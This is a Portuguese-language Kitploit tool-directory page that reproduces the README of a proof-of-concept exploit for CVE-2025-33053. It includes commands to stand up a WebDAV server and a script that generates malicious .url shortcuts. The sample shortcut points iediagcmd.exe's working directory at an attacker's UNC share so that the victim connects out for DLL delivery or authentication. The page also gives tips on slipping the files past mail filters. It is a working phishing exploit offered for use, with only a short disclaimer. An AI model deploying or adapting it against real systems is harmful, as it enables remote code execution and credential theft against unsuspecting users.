Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-33053-Proof-Of-Concept — CVE-2025-33053 Prova de Conceito (PoC) | Kitploit
Ferramentas/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
Geração de PayloadsExploraçãoMovimento LateralPhishingSegurança WebTestes de PenetraçãoComando e ControleEngenharia SocialRed Teaming
GitHubdevbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 Prova de Conceito (PoC)

Ver Repositório
64164há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-33053 Prova de Conceito

Este repositório fornece scripts para implantar automaticamente um servidor WebDAV no Ubuntu usando Apache2 e gerar arquivos de atalho .url maliciosos para uso em phishing, red teaming ou simulação de movimento lateral.


📁 Conteúdo

  • setup_webdav.sh – Script Bash para configurar o Apache2 + WebDAV.
  • setup_webdav.py – Versão em Python do script acima.
  • gen_url.py – Script Python para gerar arquivos de atalho .url com caminhos UNC/WebDAV.
  • README.md – Documentação.

🔧 Requisitos

  • SO: Ubuntu 20.04 ou mais novo (compatível com Debian)
  • Privilégios de root ()
sudo
  • Python 3.x

  • 🚀 Instruções de Configuração

    1. Servidor WebDAV (via Bash)

    root@kitploit:~
    sudo bash setup_webdav.sh
    

    Ou usando Python:

    root@kitploit:~
    sudo python3 setup_webdav.py
    

    Por padrão, o script irá:

    • Instalar o Apache e os módulos WebDAV necessários.
    • Criar um diretório compartilhado em /var/www/webdav.
    • Ativar os módulos DAV e DAV_FS.
    • Criar um diretório DavLockDB (para evitar erros de bloqueio DAV do Apache).
    • Reiniciar o serviço do Apache.

    📎 Caminho WebDAV: http://<your-ip>/webdav/


    💣 Gerando um Atalho .url Malicioso

    Exemplo de uso:

    root@kitploit:~
    python3 gen_url.py --ip 192.168.1.100 --out doc.url
    

    Todas as Opções:

    root@kitploit:~
    python3 gen_url.py \
      --ip 《YOUR IP ADDRESS》\
      --share 《YOUR SHARE NAME》(Default: webdav) \
      --out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
      --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
      --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
      --index 13 \
      --modified 20F06BA06D07BD014D
    

    Isso criará um arquivo .url como:

    root@kitploit:~
    [InternetShortcut]
    URL=C:\Program Files\Internet Explorer\iediagcmd.exe
    WorkingDirectory=\\192.168.1.100\webdav\
    ShowCommand=7
    IconIndex=13
    IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Modified=20F06BA06D07BD014D
    

    📌 Clicar neste arquivo (em certas configurações) pode fazer com que o sistema alvo se conecte automaticamente ao seu servidor WebDAV (autenticação ou entrega de DLL).


    🔒 Notas para Testes de Segurança

    • Desative o Firewall (ou abra a porta 80) se estiver testando em uma rede local:
      root@kitploit:~
      sudo ufw allow 80
      
    • Os arquivos .url podem não ser executados como esperado, dependendo de:
      • Restrições de Política de Grupo
      • Padrões de aplicativos
      • Cliente de e-mail (o Gmail pode sanitizá-los)
    • Talvez seja necessário compactar ou renomear o .url para .txt para contornar filtros.

    ⚠️ Aviso Legal

    Este repositório é apenas para fins educacionais e testes de penetração autorizados.
    Não use estes scripts contra sistemas que você não possui ou para os quais não tem permissão de testar.


    🧠 Referências

    • Configuração de servidor WebDAV - LinuxConfig.org
    • Configuração do WebDAV Apache - Peter Girnus
    • Documentação do WebDAV da Microsoft

    📬 Contato

    Para dúvidas ou solicitações éticas de red teaming, entre em contato pelas issues do GitHub.

    Baixar ferramenta